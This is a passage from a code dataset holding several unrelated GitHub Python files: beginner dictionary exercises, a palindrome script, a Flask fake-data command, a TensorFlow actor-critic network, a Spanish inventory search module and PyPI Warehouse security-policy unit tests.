'first': 'enrico',\r\n 'last': 'fermi',\r\n}\r\nfor key, value in user_0.items():\r\n print(f\"\\nKey: {key}\")\r\n print(f\"Value: {value}\")\r\nfor name, language in favorite_languages.items():\r\n print(f\"{name.title()}'s favorite language is {language.title()}.\")\r\n# 3-2 遍历字典中的所有键\r\nfor name in favorite_languages.keys():\r\n print(name.title())\r\nfriends = ['phil', 'sarah']\r\nfor name in favorite_languages.keys():\r\n print(f\"Hi {name.title()}.\")\r\n if name in friends:\r\n language = favorite_languages[name].title()\r\n print(f\"\\t{name.title()}, I see you love {language}!\")\r\nif 'erin' not in favorite_languages.keys():\r\n print(\"Erin, please take our poll!\")\r\n# 3-3 按特定顺序遍历字典中的所有键\r\nfor name in sorted(favorite_languages.keys()):\r\n print(f\"{name.title()}, thank you for taking the poll.\")\r\n# 3-4 遍历字典中的所有值\r\nprint(\"The following languages have been mentioned:\")\r\nfor language in favorite_languages.values():\r\n print(language.title())\r\n # 使用集合 set 剔除重复项\r\nprint(\"The following languages have been mentioned:\")\r\nfor language in set(favorite_languages.values()):\r\n print(language.title())\r\n# 集合 set 的定义:使用一对花括号直接创建集合,并在其中用逗号分隔元素\r\nlanguages = {'python', 'ruby', 'python', 'c'}\r\nprint(languages)\r\n# 集合和字典很容易混淆,因为它们都是用一对花括号定义的。当花括号内没有键值对时,定义的\r\n# 很可能是集合。不同于列表和字典,集合不会以特定的顺序存储元素。\r\n\r\n# 4 嵌套\r\n# 4-1 字典列表\r\nalien_0 = {'color': 'green', 'points': 5}\r\nalien_1 = {'color': 'yellow', 'points': 10}\r\nalien_2 = {'color': 'red', 'points': 15}\r\naliens = [alien_0, alien_1, alien_2]\r\nfor alien in aliens:\r\n print(alien)\r\n# 创建一个用于存储外星人的空列表。\r\naliens = []\r\n# 创建 30个绿色的外星人。\r\nfor alien_number in range(30):\r\n new_alien = {'color': 'green', 'points': 5, 'speed': 'slow'}\r\n aliens.append(new_alien)\r\n# 修改前 3个外星人的值 \r\nfor alien in aliens[:3]:\r\n if alien['color'] == 'green':\r\n alien['color'] = 'yellow'\r\n alien['speed'] = 'medium'\r\n alien['points'] = 10\r\n# 显示前 5个外星人。\r\nfor alien in aliens[:5]:\r\n print(alien)\r\nprint(\"...\")\r\n# 显示创建了多少个外星人。\r\nprint(f\"Total number of aliens: {len(aliens)}\")\r\n# 4-2 在字典中存储列表\r\npizza = {\r\n 'crust': 'thick',\r\n 'toppings': ['mushrooms', 'extra cheese'],\r\n}\r\n# 概述所点的比萨。\r\nprint(f\"You ordered a {pizza['crust']}-crust pizza with the following toppings:\")\r\nfor topping in pizza['toppings']:\r\n print(topping)\r\nfavorite_languages = {\r\n 'jen': ['python', 'ruby'],\r\n 'sarah': ['c'],\r\n 'edward': ['ruby', 'go'],\r\n 'phil': ['python', 'haskell'],\r\n}\r\nfor name, languages in favorite_languages.items():\r\n print(f\"\\n{name.title()}'s favorite languages are:\")\r\n for language in languages:\r\n print(f\"\\t{language.title()}\")\r\n# 4-3 在字典中存储字典\r\nusers = {\r\n 'aeinstein': {'first': 'albert', 'last': 'einstein', 'location': 'princeton', },\r\n 'mcurie': {'first': 'marie', 'last': 'curie', 'location': 'paris', },\r\n}\r\nfor username, user_info in users.items():\r\n print(f\"\\nUsername: {username}\")\r\n full_name = f\"{user_info['first']} {user_info['last']}\"\r\n location = user_info['location']\r\n print(f\"\\tFull name: {full_name.title()}\")\r\n print(f\"\\tLocation: {location.title()}\")\r\n","repo_name":"Zhangxiawei623/PythonCrashCourse","sub_path":"BasicKnowledge/25_dictionary.py","file_name":"25_dictionary.py","file_ext":"py","file_size_in_byte":5851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17434848284","text":"import sys\nfrom challenge.palindrome import Palindrome\n\ndef main():\n input_action = sys.argv[1]\n input_string = sys.argv[2]\n\n if input_string is None or input_action is None:\n raise ValueError(\"Missing inputs\")\n\n palindrome = Palindrome()\n\n if input_action == \"-level1\":\n print(\n \"Is palindrome? {}\".format(palindrome.is_palindrome(input_string))\n )\n elif input_action == \"-level2\":\n print(\n \"Longest palindrome: {}\".format(\n palindrome.get_longest_palindromic_string(input_string)\n )\n )\n elif input_action == \"-level3\":\n splitted, count = palindrome.get_min_splits_on_string(input_string)\n print(splitted)\n print(count)\n else:\n raise NotImplementedError\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"wreighsantos/palindrome","sub_path":"challenge.py","file_name":"challenge.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34518661772","text":"import click\nfrom bluelog.extensions import db\nfrom bluelog.fakes import fake_admin, fake_categories, fake_comments, fake_posts\n\n\ndef register_commands(app):\n @app.cli.command()\n @click.option('--category',\n default=10,\n help='Quantity of categories, default is 10.')\n @click.option('--post',\n default=50,\n help='Quantity of posts, default is 50.')\n @click.option('--comment',\n default=500,\n help='Quantity of comments, default is 500.')\n def forge(category, post, comment):\n '''Generate the fake data'''\n\n db.drop_all()\n db.create_all()\n\n click.echo('Generating the administrator...')\n fake_admin()\n click.echo(f'Generating {category} categories...')\n fake_categories(category)\n click.echo(f'Generating {post} post...')\n fake_posts(post)\n click.echo(f'Generating {comment} comments...')\n fake_comments(comment)\n\n click.echo('Done...')","repo_name":"Myfour/Flask-Study","sub_path":"Flask-wolf/bluelog/bluelog/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38656320084","text":"# -*- coding: utf-8 -*-\nimport tensorflow as tf\nimport numpy as np\n#import cPickle as pickle # For python 2.7, see https://askubuntu.com/questions/742782/how-to-install-cpickle-on-python-3-4\nimport pickle\nimport copy\nimport subprocess\n\n\nfrom myUtils import lazy_property, dense, variable_summaries_history, variable_summaries_layer, variable_summaries_scalar, getActionList, getNonZeroActionList,episodeBuffer\n\n\nclass ACNet(object):\n def __init__(self, scope, config, globalAC=None, summary_writer=None):\n self.config = config\n self.globalAC = globalAC\n self.action_dim = self.config.N_A\n self.state_dim = self.config.N_S\n self.summary_writer = summary_writer\n self.is_local_net = globalAC is not None\n self.name = scope\n if scope == self.config.GLOBAL_NET_SCOPE: # get global network\n self.trial_buffers_max_size = 30\n self.best_trial_buffer = []\n self.best_trial_buffers = []\n self.best_trial_fitness = 0.0\n self.best_trial_fitnesses = []\n with tf.variable_scope(scope):\n self.state_input = tf.placeholder(shape=[None, self.state_dim, self.config.TEMPORAL_WINDOW], dtype=tf.float32, name=\"S\")\n # initialize actor-net according to different config.mode\n self.actions = self.action_get_current(reuse=True)\n self.value_get_current\n self.actor_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/actor')\n self.critic_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/critic')\n else:\n with tf.variable_scope(scope):\n self.state_input = tf.placeholder(shape=[None, self.state_dim, self.config.TEMPORAL_WINDOW], dtype=tf.float32)\n self.action_input = tf.placeholder(tf.float32, [None, self.action_dim])\n self.action_input_target = tf.placeholder(tf.float32, [None, self.action_dim])\n self.value_target = tf.placeholder(tf.float32, [None, 1])\n self.advantages = tf.placeholder(tf.float32, [None, 1])\n\n self.actions = self.action_get_current(reuse=False)\n self.value_get_current\n\n self.TD_loss\n self.TL_loss\n self.critic_loss\n self.actor_loss\n\n #Get gradients from local network using local losses\n self.actor_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/actor')\n self.critic_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/critic')\n self.actor_grads = tf.gradients(self.actor_loss, self.actor_params)\n self.critic_grads = tf.gradients(self.critic_loss, self.critic_params)\n\n self.optimizer_actor = tf.train.AdamOptimizer(self.config.LR_A,epsilon=1e-01)\n self.optimizer_critic = tf.train.AdagradOptimizer(self.config.LR_C)\n\n #Interact with global network\n self.pull_params\n self.pull_critic_params\n self.pull_actor_params\n self.push_params\n self.push_critic_params\n self.push_actor_params\n\n with tf.variable_scope('rewards'):\n if self.name == \"W_0\":\n tf.summary.scalar(\"mean\", tf.reduce_mean(self.value_target))\n tf.summary.histogram(\"targets\", self.value_target)\n # variable_summaries_scalar(self.value_target,self.is_local_net)\n\n if self.summary_writer is not None:\n if self.name == \"W_0\":\n self.summaries = tf.summary.merge_all()\n\n def loadBestInvid(self):\n bashCommand = \"ls -l {}/\".format(self.config.SAVE_DIR) + \" | grep 'bestOpen' | awk '{print $9}' | sed -e 's/_/ /g' | awk '{print $2}' | sed -e 's/\\./ /g' | awk '{print $1}'\"\n #print bashCommand\n stdout, _ = subprocess.Popen(bashCommand, shell=True, stdout=subprocess.PIPE).communicate()\n np.array([int(i) for i in stdout.split('\\n')[:-1]])\n\t#print '{}/bestOpenLoopActor_{}.pickle'.format(self.config.SAVE_DIR,max(np.array([int(i) for i in stdout.split('\\n')[:-1]])))\n with open('{}/bestOpenLoopActor_{}.pickle'.format(self.config.SAVE_DIR,max(np.array([int(i) for i in stdout.split('\\n')[:-1]]) )),'rb') as input_file: \n self.best_trial_buffer = pickle.load(input_file)\n self.best_trial_fitness = self.best_trial_buffer[-1][2] # Last reward is the fitness\n self.best_trial_buffers.append(self.best_trial_buffer)\n self.best_trial_fitnesses.append(self.best_trial_fitness)\n \n\n def updateInvid(self,episode_buffer, actual_fitness):\n # We want to save to file the best (open loop) invid so that it can be replayed later\n # This can be used to offline test the convergence of the actor. \n best_fitness = -10000.0\n if(self.best_trial_fitness != 0):\n best_fitness = self.best_trial_fitness\n\n # We update the buffers of less good indivd\n if(self.best_trial_fitness != actual_fitness):\n self.best_trial_buffers.append(copy.deepcopy(episode_buffer))\n self.best_trial_fitnesses.append(actual_fitness)\n\n if(actual_fitness >= best_fitness):\n # for i in episode_buffer:\n # print(\"{}\".format(i[episodeBuffer.a]))\n self.best_trial_buffer = copy.deepcopy(episode_buffer)\n self.best_trial_fitness = actual_fitness\n with open(r\"{}/bestOpenLoopActor_{}.pickle\".format(self.config.SAVE_DIR,self.config.GLOBAL_EP), \"wb\") as output_file:\n pickle.dump(self.best_trial_buffer, output_file)\n\n # If fitness is big we fluzh the best directino buffer.\n # if(actual_fitness > 1.2*best_fitness):\n # self.best_trial_fitnesses = []\n # self.best_trial_buffers = []\n # self.best_trial_fitnesses.append(copy.deepcopy(actual_fitness))\n # self.best_trial_buffers.append(episode_buffer)\n # return \n\n\n\n\n superSort =lambda X,Y: [x for _ , x in sorted(zip(Y,X), key=lambda pair: pair[0])]\n\n self.best_trial_fitnesses = superSort(self.best_trial_fitnesses,self.best_trial_fitnesses)\n self.best_trial_buffers = superSort(self.best_trial_buffers,self.best_trial_fitnesses)\n\n #self.best_trial_fitnesses.reverse()\n #self.best_trial_buffers.reverse()\n if(len(self.best_trial_fitnesses) > self.trial_buffers_max_size):\n self.best_trial_fitnesses.pop()\n self.best_trial_buffers.pop()\n\n def getBestDirection(self):\n if(len(self.best_trial_fitnesses) < 2):\n return []\n best = getNonZeroActionList(self.best_trial_buffer)\n Fbest = self.best_trial_fitness\n\n\n bads = [getNonZeroActionList(buf) for buf in self.best_trial_buffers]\n Fbads = [f for f in self.best_trial_fitnesses]\n\n #tot = sum([(best - bad) * (Fbest - Fbad)/Fbest for Fbad, bad in zip(Fbads, bads)])[0]\n #tot = sum([(best - bad) * (Fbest - Fbad) for Fbad, bad in zip(Fbads, bads)])[0]\n #tot = sum([(best - bad) for Fbad, bad in zip(Fbads, bads)])[0]\n #scale = len(Fbads)\n tot = sum([(best - bad) * (Fbest - Fbad) for Fbad, bad in zip(Fbads, bads)])[0]\n scale = sum([Fbest - Fbad for Fbad in Fbads])*len(Fbads)\n return tot/scale\n\n\n\n @lazy_property\n def actor_loss(self):\n with tf.variable_scope('actor_loss'):\n actor_loss = tf.reduce_mean(tf.square(self.TL_loss))#*tf.reduce_sum(0.1*tf.reduce_mean(self.advantages,axis=0))\n if self.name == \"W_0\":\n variable_summaries_scalar(actor_loss,self.is_local_net)\n return actor_loss\n\n @lazy_property\n def critic_loss(self):\n with tf.variable_scope('critic_loss'):\n critic_loss = tf.reduce_mean(tf.square(self.TD_loss))\n if self.name == \"W_0\":\n variable_summaries_scalar(critic_loss,self.is_local_net)\n return critic_loss\n\n @lazy_property\n def TL_loss(self):\n return tf.subtract(self.actions, self.action_input_target)\n\n @lazy_property\n def TD_loss(self):\n return tf.subtract(self.value_target, self.value_get_current)\n\n @lazy_property\n def value_get_current(self):\n with tf.variable_scope('critic'):\n w_i = tf.random_uniform_initializer(0., 0.1)\n type = self.config.CRITIC_NETWORK_TYPE\n if type == 1:\n with tf.variable_scope('dense1'):\n dense1 = dense(self.state_input, 256, [256], w_i, activation=tf.nn.relu)\n if self.name == \"W_0\":\n variable_summaries_layer(dense1,self.is_local_net)\n with tf.variable_scope('dense2'):\n dense2 = dense(dense1, 1, [1], w_i, activation=None)\n if self.name == \"W_0\":\n variable_summaries_layer(dense2,self.is_local_net)\n return dense2\n elif type == 2:\n with tf.variable_scope('dense1'):\n dense1 = dense(self.state_input, 512, [512], w_i, activation=tf.nn.relu)\n variable_summaries_layer(dense1,self.is_local_net)\n with tf.variable_scope('dense2'):\n dense2 = dense(dense1, 256, [256], w_i, activation=tf.nn.relu)\n variable_summaries_layer(dense2,self.is_local_net)\n with tf.variable_scope('dense3'):\n dense3 = dense(dense2, 1, [1], w_i, b_i, activation=None)\n variable_summaries_layer(dense3,self.is_local_net)\n return dense3\n else:\n with tf.variable_scope('dense1'):\n dense1 = dense(self.state_input, 128, [128], w_i, activation=tf.nn.selu)\n variable_summaries_layer(dense1,self.is_local_net)\n with tf.variable_scope('dense2'):\n dense2 = dense(self.state_input, 128, [128], w_i, activation=tf.nn.selu)\n variable_summaries_layer(dense2,self.is_local_net)\n with tf.variable_scope('dense3'):\n dense3 = dense(tf.concat([dense1,dense2],axis=1), 1, [1], w_i, b_i, activation=None)\n variable_summaries_layer(dense3,self.is_local_net)\n return dense3\n\n # Note: We need 2 return value here: mu & sigma. So it is not suitable to use lazy_property.\n def action_get_current(self, reuse=False):\n # Graph shared with Value Net\n with tf.variable_scope('actor'):\n w_i = tf.initializers.glorot_normal()\n b_i = tf.zeros_initializer()\n\n if self.config.ACTOR_NETWORK_TYPE == 1:\n with tf.variable_scope('act_dense1'):\n dense1 = dense(self.state_input, 512, [512], w_i, activation=tf.nn.relu)\n if not reuse and self.name == \"W_0\":\n variable_summaries_layer(dense1,self.is_local_net)\n with tf.variable_scope('act_dense2'):\n dense2 = dense(dense1, 256, [256], w_i, activation=tf.nn.relu)\n if not reuse and self.name == \"W_0\":\n variable_summaries_layer(dense2,self.is_local_net)\n\n if not reuse and self.name == \"W_0\":\n tf.contrib.layers.summarize_activation(dense1)\n tf.contrib.layers.summarize_activation(dense2)\n with tf.variable_scope('mu'):\n mu = dense(dense2, self.action_dim, None, w_i, activation=None)\n if not reuse and self.name == \"W_0\":\n variable_summaries_history(mu,self.is_local_net)\n\n elif self.config.ACTOR_NETWORK_TYPE == 11:\n with tf.variable_scope('act_dense1'):\n dense1 = dense(self.state_input, 512, [512], w_i, activation=tf.nn.relu)\n if not reuse and self.name == \"W_0\":\n variable_summaries_layer(dense1,self.is_local_net)\n with tf.variable_scope('act_dense2'):\n dense2 = dense(dense1, 256, [256], w_i, activation=tf.nn.relu)\n if not reuse and self.name == \"W_0\":\n variable_summaries_layer(dense2,self.is_local_net)\n with tf.variable_scope('act_dense3'):\n dense3 = dense(dense2, 256, [256], w_i, b_i, activation=tf.nn.relu)\n if not reuse and self.name == \"W_0\":\n variable_summaries_layer(dense3,self.is_local_net)\n\n if not reuse and self.name == \"W_0\":\n tf.contrib.layers.summarize_activation(dense1)\n tf.contrib.layers.summarize_activation(dense2)\n tf.contrib.layers.summarize_activation(dense3)\n with tf.variable_scope('mu'):\n mu = dense(dense3, self.action_dim, None, w_i, activation=None)\n if not reuse and self.name == \"W_0\":\n variable_summaries_history(mu,self.is_local_net)\n\n else:\n raise ValueError('Network type \"{}\" not implemented, should be integer'.format(self.config.ACTOR_NETWORK_TYPE))\n return mu\n\n @lazy_property\n def pull_actor_params(self):\n pull_actor_params = [tf.assign(l_p, g_p) for g_p, l_p in zip(self.globalAC.actor_params, self.actor_params)]\n return [pull_actor_params]\n\n @lazy_property\n def pull_critic_params(self):\n pull_critic_params = [tf.assign(l_p, g_p) for g_p, l_p in zip(self.globalAC.critic_params, self.critic_params)]\n return [pull_critic_params]\n\n @lazy_property\n def pull_params(self):\n pull_actor_params = [tf.assign(l_p, g_p) for g_p, l_p in zip(self.globalAC.actor_params, self.actor_params)]\n pull_critic_params = [tf.assign(l_p, g_p) for g_p, l_p in zip(self.globalAC.critic_params, self.critic_params)]\n return [pull_actor_params, pull_critic_params]\n\n @lazy_property\n def push_actor_params(self):\n push_actor_params = self.optimizer_actor.apply_gradients(zip(self.actor_grads, self.globalAC.actor_params))\n return [push_actor_params]\n\n @lazy_property\n def push_critic_params(self):\n push_critic_params = self.optimizer_critic.apply_gradients(zip(self.critic_grads, self.globalAC.critic_params))\n return [push_critic_params]\n\n @lazy_property\n def push_params(self):\n push_actor_params = self.optimizer_actor.apply_gradients(zip(self.actor_grads, self.globalAC.actor_params))\n push_critic_params = self.optimizer_critic.apply_gradients(zip(self.critic_grads, self.globalAC.critic_params))\n return [push_actor_params, push_critic_params]\n\n @lazy_property\n def sample_action(self):\n return self.actions\n","repo_name":"NikosKokkinis/deep-rl-webots","sub_path":"biorob-rl/Network.py","file_name":"Network.py","file_ext":"py","file_size_in_byte":15070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"36108626531","text":"cars={}\ncars[\"Maruti\"]=4687,\ncars[\"BMW\"]=7545\ndel cars[\"BMW\"]\n\nprint(cars)\n\nadict={\n 1:\"apple\",\n 2:\"banana\",\n 3:\"orange\",\t\n \"year\":2020\n\t}\nadict.clear()\n\nadict.popitem()\nfor x in adict:\n print(x) \n#for y in adict:\n \n\n","repo_name":"prikshat/CAP906","sub_path":"d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72891289362","text":"#operasi pencari ganjil genap\n\nwhile True:\n angka = int(input('masukkan angka untuk mencari genap atau ganjil: '))\n if angka % 2 == 0:\n print('angka genap')\n else :\n print('angka ganjil')\n lagi = input('apakah anda ingin lagi(y/t): ')\n if lagi == 't':\n break\n elif lagi == 'y':\n continue\n else:\n print('anda tidak memasukkab y atau t')","repo_name":"royhankamil/python-project","sub_path":"mencari ganjil genap/mencari_ganjil_genap.py","file_name":"mencari_ganjil_genap.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6046079537","text":"\"\"\"\r\nModulo para hacer busqueda dentro del inventario\r\n\r\n\"\"\"\r\n\r\nfrom os import system\r\n\r\ninventario_path = \"txt/inventario.txt\"\r\nresults_path = \"txt/result.txt\"\r\n\r\n\r\n# Funcion para escribir dentro de un archivo de texto\r\ndef txt(info):\r\n with open(results_path, 'w') as result:\r\n result.write(info)\r\n\r\n\r\n# Funcion para hacer una busqueda general\r\ndef bgeneral(producto):\r\n encontrado = 0 # variable que nos dira si encontramos o no el producto\r\n # vamos a abrir el archivo plano donde estan almacenados los productos\r\n with open(inventario_path) as inventario:\r\n for linea in inventario: # por cada linea que tiene el archivo plano\r\n datos = linea.split(\",\") # dividiremos los datos que tiene cada linea\r\n\r\n if producto == datos[0] or producto == datos[1]: # si el nombre del producto esta dentro de la linea\r\n encontrado = 1 # al cambiar a uno, significa que encontramos el producto y retornamos los resultados\r\n return f\"\\nNombre de producto: {datos[0]}\\nCodigo: {datos[1]}\\nPrecio: {datos[2]}\\nEn inventario: {datos[3]}\" # regresamos el nombre, codigo y precio del producto\r\n\r\n if encontrado == 0: # si no encontramos el producto, la variable se mantendra en 0 y retornamos que no lo encontramos\r\n return \"Producto no encontrado\"\r\n\r\n\r\n# Funcion para hacer una busqueda por medio de codigo\r\ndef bcodigo1(codigo):\r\n encontrado = 0\r\n # vamos a abrir el archivo plano donde estan almacenados los productos\r\n with open(inventario_path) as inventario:\r\n for linea in inventario: # por cada linea que tiene el archivo plano\r\n datos = linea.split(\",\") # vamos a dividir los datos de cada linea dentro de un arreglo\r\n\r\n if codigo == datos[1]: # si el codigo del producto esta dentro de la linea\r\n encontrado = 1\r\n return f\"Nombre producto: {datos[0]}\\nPrecio: {datos[2]}\\nCantidad Disponible: {datos[3]}\" # regresamos el nombre y precio del producto\r\n \r\n if encontrado == 0:\r\n return \"Producto no encontrado\"\r\n \r\n\r\n# Funcion de busqueda por rango de precios\r\ndef brango(rango_i:int, rango_f:int):\r\n lista = []\r\n # rango_i seria precio inicial y rango_f seria precio final, para marcar el rango de los precios\r\n with open(inventario_path) as inventario:\r\n with open(results_path, 'w') as result:\r\n for linea in inventario: # por cada linea que hay en producto.txt\r\n datos = linea.split(\",\") # dividimos los datos de cada linea\r\n if int(datos[2]) >= rango_i and int(datos[2]) <= rango_f: # si los datos del precio es igual o mayor al rango inicial y menior o igual al rango final\r\n result.write(f\"{datos[0]}: ${datos[2]}\\n\")\r\n print(f\"{datos[0]}: ${datos[2]}\") # agregamos el nombre del producto y su precio dentro del arreglo llamado lista\r\n lista.append(datos[0])\r\n \r\n print(\"\\nHay un total de\", len(lista), \"productos con ese rango de precio\")\r\n\r\n\r\n# Funcion para retornar el stock disponible\r\ndef bstock(producto):\r\n # vamos a abrir el archivo plano donde estan almacenados los productos\r\n with open(inventario_path) as inventario:\r\n for linea in inventario: # por cada linea que tiene el archivo plano\r\n datos = linea.split(\",\") # dividiremos los datos que tiene cada linea\r\n if producto in datos[0] or producto in datos[1]: # si el nombre del producto o codigo esta dentro de la linea\r\n return int(datos[3]) # retornamos cuanto tenemos en stock\r\n\r\n\r\n# Funcion para retornar precio de un producto\r\ndef bprecio(producto):\r\n # vamos a abrir el archivo plano donde estan almacenados los productos\r\n with open(inventario_path) as inventario:\r\n for linea in inventario: # por cada linea que tiene el archivo plano\r\n datos = linea.split(\",\") # dividiremos los datos que tiene cada linea\r\n if producto in datos[0] or producto in datos[1]: # si el nombre del producto o codigo esta dentro de la linea\r\n return int(datos[2]) # retornamos cuanto cuesta el producto\r\n\r\n\r\n# Funcion para hacer una busqueda por medio de codigo o nombre de producto\r\ndef bproducto(producto):\r\n encontrado = 0\r\n # vamos a abrir el archivo plano donde estan almacenados los productos\r\n with open(inventario_path) as inventario:\r\n for linea in inventario: # por cada linea que tiene el archivo plano\r\n datos = linea.split(\",\") # vamos a dividir los datos de cada linea dentro de un arreglo\r\n\r\n if producto == datos[1] or producto == datos[0]: # si el codigo del producto esta dentro de la linea\r\n encontrado = 1\r\n return datos[0]\r\n \r\n if encontrado == 0:\r\n # return \"Producto no encontrado\"\r\n return False\r\n\r\n\r\n# Funcion para mostrar todos los productos disponibles\r\ndef mostrarProductos():\r\n with open(inventario_path) as inventario:\r\n for linea in inventario:\r\n producto = linea.split(\",\")\r\n print(producto[0])\r\n\r\n\r\n# Muestra los articulos agotados, los que tienen stock 0\r\ndef agotados():\r\n system('cls')\r\n print(\"Productos agotados: \")\r\n with open(inventario_path) as inventario:\r\n for linea in inventario:\r\n producto = linea.split(\",\")\r\n if producto[3] == \"0\\n\":\r\n print(producto[0])\r\n \r\n\r\n# Muestra los articulos disponibles, stock mayor a 0\r\ndef disponibles():\r\n system('cls')\r\n print(\"Productos disponibles: \")\r\n with open(inventario_path) as products_file:\r\n for linea in products_file:\r\n producto = linea.split(\",\")\r\n if producto[3] != \"0\\n\":\r\n print(producto[0])\r\n \r\n input(\"\\nPresiona Enter para seguir\")\r\n","repo_name":"liangbinjie/pyme-fotografia","sub_path":"buscador.py","file_name":"buscador.py","file_ext":"py","file_size_in_byte":5845,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"43805445450","text":"import json\nimport os\nimport shutil\n\ndirectoryToSave = 'extracted'\ndirectoryToSearch = 'resized_rsync'\ndirectoryMetadata = 'metadata'\n\ndef writefile(filename, text):\n f = open(filename, \"w\")\n f.write(text)\n print('Saved the following: ' + text)\n f.close()\n\nnumero = -1\nfor i in range(12):\n numero = numero + 1\n str_numero = str(numero)\n zfilled = str_numero.zfill(2)\n json_file_name = \"metadata/posts0000000000\" + zfilled + \".json\"\n print(json_file_name)\n ","repo_name":"Kingkobe150/stable-diffusion-scripts","sub_path":"scripts/optimized_extractor.py","file_name":"optimized_extractor.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"43023712694","text":"# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport pretend\n\nfrom pyramid.interfaces import ISecurityPolicy\nfrom zope.interface.verify import verifyClass\n\nfrom warehouse.utils import security_policy\n\n\ndef test_principals_for():\n identity = pretend.stub(__principals__=lambda: [\"a\", \"b\", \"z\"])\n assert security_policy.principals_for(identity) == [\"a\", \"b\", \"z\"]\n\n\ndef test_principals_for_with_none():\n assert security_policy.principals_for(pretend.stub()) == []\n\n\nclass TestMultiSecurityPolicy:\n def test_verify(self):\n assert verifyClass(\n ISecurityPolicy,\n security_policy.MultiSecurityPolicy,\n )\n\n def test_reset(self):\n identity1 = pretend.stub()\n identity2 = pretend.stub()\n identities = iter([identity1, identity2])\n\n subpolicies = [pretend.stub(identity=lambda r: next(identities))]\n policy = security_policy.MultiSecurityPolicy(subpolicies)\n\n request = pretend.stub(add_finished_callback=lambda *a, **kw: None)\n\n assert policy.identity(request) is identity1\n assert policy.identity(request) is identity1\n\n policy.reset(request)\n\n assert policy.identity(request) is identity2\n\n def test_identity_none(self):\n subpolicies = [pretend.stub(identity=lambda r: None)]\n policy = security_policy.MultiSecurityPolicy(subpolicies)\n\n request = pretend.stub(add_finished_callback=lambda *a, **kw: None)\n assert policy.identity(request) is None\n\n def test_identity_first_come_first_serve(self):\n identity1 = pretend.stub()\n identity2 = pretend.stub()\n subpolicies = [\n pretend.stub(identity=lambda r: None),\n pretend.stub(identity=lambda r: identity1),\n pretend.stub(identity=lambda r: identity2),\n ]\n policy = security_policy.MultiSecurityPolicy(subpolicies)\n\n request = pretend.stub(add_finished_callback=lambda *a, **kw: None)\n assert policy.identity(request) is identity1\n\n def test_authenticated_userid_no_identity(self):\n request = pretend.stub(add_finished_callback=lambda *a, **kw: None)\n subpolicies = [pretend.stub(identity=lambda r: None)]\n policy = security_policy.MultiSecurityPolicy(subpolicies)\n\n assert policy.authenticated_userid(request) is None\n\n def test_authenticated_userid_nonuser_identity(self, db_request):\n request = pretend.stub(add_finished_callback=lambda *a, **kw: None)\n nonuser = pretend.stub(id=\"not-a-user-instance\")\n subpolicies = [pretend.stub(identity=lambda r: nonuser)]\n policy = security_policy.MultiSecurityPolicy(subpolicies)\n\n assert policy.authenticated_userid(request) is None\n\n def test_authenticated_userid(self, monkeypatch):\n monkeypatch.setattr(security_policy, \"User\", pretend.stub)\n\n request = pretend.stub(add_finished_callback=lambda *a, **kw: None)\n user = pretend.stub(id=\"a fake user\")\n subpolicies = [pretend.stub(identity=lambda r: user)]\n policy = security_policy.MultiSecurityPolicy(subpolicies)\n\n assert policy.authenticated_userid(request) == str(user.id)\n\n def test_forget(self):\n subpolicies = [pretend.stub(forget=lambda r, **kw: [(\"ForgetMe\", \"1\")])]\n policy = security_policy.MultiSecurityPolicy(subpolicies)\n\n request = pretend.stub()\n assert policy.forget(request, foo=None) == [(\"ForgetMe\", \"1\")]\n\n def test_remember(self):\n subpolicies = [\n pretend.stub(remember=lambda r, uid, foo, **kw: [(\"RememberMe\", foo)])\n ]\n policy = security_policy.MultiSecurityPolicy(subpolicies)\n\n request = pretend.stub()\n userid = pretend.stub()\n assert policy.remember(request, userid, foo=\"bob\") == [(\"RememberMe\", \"bob\")]\n\n def test_permits(self):\n identity1 = pretend.stub()\n identity2 = pretend.stub()\n context = pretend.stub()\n\n subpolicies = [\n pretend.stub(identity=lambda r: None),\n pretend.stub(\n identity=lambda r: identity1,\n permits=(\n lambda r, c, p: r.identity == identity1\n and c == context\n and p == \"myperm\"\n ),\n ),\n pretend.stub(identity=lambda r: identity2),\n ]\n policy = security_policy.MultiSecurityPolicy(subpolicies)\n\n request = pretend.stub(\n identity=identity1,\n add_finished_callback=lambda *a, **kw: None,\n )\n\n assert policy.permits(request, context, \"myperm\")\n\n def test_permits_no_policy(self):\n subpolicies = [\n pretend.stub(identity=lambda r: None),\n pretend.stub(identity=lambda r: None),\n pretend.stub(identity=lambda r: None),\n ]\n policy = security_policy.MultiSecurityPolicy(subpolicies)\n request = pretend.stub(\n identity=None, add_finished_callback=lambda *a, **kw: None\n )\n context = pretend.stub()\n\n assert not policy.permits(request, context, \"myperm\")\n","repo_name":"pypi/warehouse","sub_path":"tests/unit/utils/test_security_policy.py","file_name":"test_security_policy.py","file_ext":"py","file_size_in_byte":5604,"program_lang":"python","lang":"en","doc_type":"code","stars":3382,"dataset":"github-code","pt":"3"} 